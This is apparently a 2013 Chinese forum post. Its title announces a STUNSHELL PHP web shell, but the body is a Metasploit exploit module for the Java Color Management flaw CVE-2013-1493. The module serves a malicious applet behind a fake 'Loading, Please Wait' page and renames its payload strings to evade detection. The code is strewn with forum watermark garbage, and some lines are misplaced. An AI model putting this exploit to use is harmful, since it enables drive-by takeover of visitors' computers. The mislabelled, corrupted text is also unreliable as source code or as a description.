
标题: STUNSHELL PHP Web Shell远程执行代码

作者: admin    时间: 2013-4-4 17:31
标题: STUNSHELL PHP Web Shell远程执行代码（注：下文粘贴的代码实际上是 Metasploit 的 "Java CMM Remote Code Execution" 模块，对应 CVE-2013-1493，与标题所称的 STUNSHELL PHP Web Shell 不符；贴文中的代码夹杂了论坛水印噪声字符，并非可直接阅读的原始源码。）
##8 r- i% L. G& R
- ?% d( P1 ?8 L1 P  T* `
# This file is part of the Metasploit Framework and may be subject to
5 s  F& v5 P' Q& o& P/ \# redistribution and commercial restrictions. Please see the Metasploit
/ i4 c3 E) h. h( B" ?# K# web site for more information on licensing and terms of use.
! p4 ~7 o: ^9 m% q5 f# http://metasploit.com/: B/ d7 X* a- b
##
9 Y( b# H1 X. p& Z8 A% Brequire ‘msf/core’
' ~3 r+ J2 S1 grequire ‘rex’8 P6 i7 @4 R6 b& \* N' b* e
class Metasploit3 < Msf::Exploit::Remote) @1 t5 c0 c# K& {' n/ N; o& \  @
Rank = NormalRanking: z% |% [; c2 Z2 R% S
include Msf::Exploit::Remote::HttpServer::HTML8 I, y1 I2 d) w/ k
include Msf::Exploit::EXE
; s# k$ p. F4 S# F) W% D+ }* G6 |include Msf::Exploit::Remote::BrowserAutopwn
3 i0 [2 a' w' y' Pautopwn_info({ :javascript => false })2 M6 Q0 j9 l+ Z
def initialize( info = {} )
0 L4 C( T+ f/ }' I" m$ ysuper( update_info( info,
  g3 v) |& h' }# |‘Name’ => ‘Java CMM Remote Code Execution’,
, \9 n9 g4 }1 ?‘Description’ => %q{
; V! E) m& w7 w: m9 ^, nThis module abuses the Color Management classes from a Java Applet to run, `5 \' ^  X; P7 h, l
arbitrary Java code outside of the sandbox as exploited in the wild in February
" h: a) S% J5 Jand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41- Q3 \0 a$ e6 Y/ X
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
. v+ l& V1 z( W" P' @8 b1 G6 P( L8 Msystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
) W. a" @- E/ w4 \* n- B8 ^warning in order to run the malicious applet.
* E+ [$ S  }. i+ ^},
5 J. `! e. e4 f9 }  h+ k‘License’ => MSF_LICENSE,( s& u+ l7 \; @5 t7 F2 s8 z/ k% R
‘Author’ =>
$ Z; G$ U$ s7 v/ C'Unknown', # Vulnerability discovery and Exploit' \* j+ [7 `# ^4 y6 D  E0 [  e  e
'juan vazquez' # Metasploit module (just ported the published exploit)9 l2 b6 h; W& x  f
],
8 E& V4 D4 s" C1 F1 m" a‘References’ =>0 b  J) u+ ]! `* x3 ^2 B! Z
[
8 P3 w9 \# C& Z' M& L[ 'CVE', '2013-1493' ],3 T' h  o# J+ k0 d* M% V4 \) I: u
[ 'OSVDB', '90737' ],6 r: Y  L+ ?: _6 _: B( m9 p) S
[ 'BID', '58238' ],
. n% A0 A$ D( T. h' b[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
  H) S. p' `8 y/ M# `, j[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
1 ~' n( ]' o- }! D" q' s% M[ 'URL', 'http://pastie.org/pastes/6581034' ]* b; C, \, s: i1 Y* e- n! z* \% {
],
' i6 w$ e. a  r7 g& O‘Platform’ => [ 'win', 'java' ],
  `# c$ }: O6 J1 M' A0 q/ x‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
: e* U$ X) h6 P7 T‘Targets’ =>( @1 T" {9 w" {5 Q
[* `9 m( E; F0 j( a2 _
[ 'Generic (Java Payload)',3 q9 v$ E. b' b1 V+ F3 J" A
{1 S9 {" m7 N/ \/ M5 D( N
'Platform' => 'java',
0 e; h5 `4 ?7 Y( m3 Q'Arch' => ARCH_JAVA2 l! J0 U9 W! E
}
9 e* x3 v3 _. n( N! `],
! u- b6 M. Y1 H[ 'Windows x86 (Native Payload)',6 V6 J2 @% Z, n7 b  n
{
. f' E" L8 R  l'Platform' => 'win',+ ]; s5 X- H" i( [
'Arch' => ARCH_X869 D4 G" o) g' y. U4 T
}7 Z9 C" j  x" R' N% ]( t8 e" K) u
]5 c8 _$ I) O' ?
],
5 s2 p% K& I6 R" Y  Y$ q‘‘DisclosureDate’ => ‘Mar 01 2013′8 ?  V" z2 M# U! T! _! i
))
0 ]8 \# i9 ~8 @# {# q/ M: Lend6 Q" u* b. J0 x7 t/ r2 m
def setup# d8 F2 T+ K' ~" R- [1 C$ ~$ g: B
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)( ?, c; g0 N  Q1 h
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }( X- X% E0 S0 @) f
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”). c% {2 T2 [+ J3 J) U
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }2 q! d, T  Q0 e& x8 I% ?. b1 U
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
* P  p: W0 q8 x@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
4 ^2 U$ w3 R) g% V6 j" S: Gpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
3 v/ o/ `: D( T. v9 B# j2 a" e" {, S@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
; {8 y' F8 M7 o" B/ [@init_class_name = rand_text_alpha(“Init”.length), l3 S; Y; r7 T3 c( v
@init_class.gsub!(“Init”, @init_class_name)
, Y$ M* |, k* `$ ssuper
0 f; B, ~/ I5 r" g* nend0 ]) i* D# t" B4 E/ o5 T
def on_request_uri(cli, request)
0 f: }6 ^5 f( h# [print_status(“handling request for #{request.uri}”)
2 J! |: a! D$ m1 F- pcase request.uri
. H' O3 O( m  p- L- Ywhen /\.jar$/i
& }: |* P/ w# e2 Z2 L7 |jar = payload.encoded_jar
0 e, ^3 g# o8 @; d- k" c; M4 h" H2 X7 Yjar.add_file(“#{@init_class_name}.class”, @init_class)
3 F* Q5 g" W/ }6 ujar.add_file(“Leak.class”, @leak_class)2 g. r6 _+ o& v# i& a. T8 W
jar.add_file(“MyBufferedImage.class”, @buffered_image_class). Z4 g: h' r% H% W/ a
jar.add_file(“MyColorSpace.class”, @color_space_class)
/ f! r6 @) B; m9 l( C8 N; TDefaultTarget’ => 1,5 t9 u( z) p( p) y4 x
metasploit_str = rand_text_alpha(“metasploit”.length)9 H, ?/ Y, `  u' o
payload_str = rand_text_alpha(“payload”.length), M! {& M7 S/ |6 a/ ]
jar.entries.each { |entry|4 Z) h0 Y9 y  L4 |
entry.name.gsub!(“metasploit”, metasploit_str)# A& D# a; r8 E6 d& i9 Y: L" U8 N
entry.name.gsub!(“Payload”, payload_str)
( z4 N; W% m( centry.data = entry.data.gsub(“metasploit”, metasploit_str)4 P3 _# [0 ?4 R6 r% D6 v  r
entry.data = entry.data.gsub(“Payload”, payload_str)
% ~- i( Q/ M* I* r& B, }}/ @4 _" B9 ^2 x1 p  A5 }- d
jar.build_manifest+ Q2 c+ U4 I# n5 X) z* ~* R  ^
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })% G/ n1 J) |& u0 s  P+ W! x& x
when /\/$/
6 M1 h0 P3 T1 H! b/ ?* \6 Q& tpayload = regenerate_payload(cli)8 }1 _9 P, L3 A; [- @7 M
if not payload
$ }$ D8 h: N# _& b' {4 Jprint_error(“Failed to generate the payload.”)
  I5 `0 N0 J+ e$ A6 k$ Hsend_not_found(cli), I- y" z3 y  W+ T3 ?* p
return" s. F3 A+ H" p7 Y, t- z" g
end
6 ]5 ]- y5 Z2 H, V( Rsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
  @2 p/ m+ B" D9 t, T: lelse
7 u- w& H6 Y8 _- Csend_redirect(cli, get_resource() + ‘/’, ”)
1 M. V# ~( [$ Z# i# [. O# ~# Pend: c- m- `, F( L, [% y; H+ M6 f& \- k
end
" _2 ~; r' U) s; Cdef generate_html- `' f( M) f5 y* ?6 ~
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|+ T, @; R/ \, y/ [/ n7 W" \
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
; D- ]) e3 K9 H* Y$ ~8 v* s( rhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
! E" R8 [/ A& z3 v- T" B: P! q. M. [html += %Q|</applet></body></html>|/ Y4 |1 Q$ Z4 u; B  u! y% w4 C
return html0 w; T" t8 M- q/ {* k4 d: d8 Z
end, f$ P3 |" K9 D! m; O# i/ ]' Z
end
! s8 E$ z8 r( X- T  Mend
: @! i0 K& i* @9 `3 y+ C



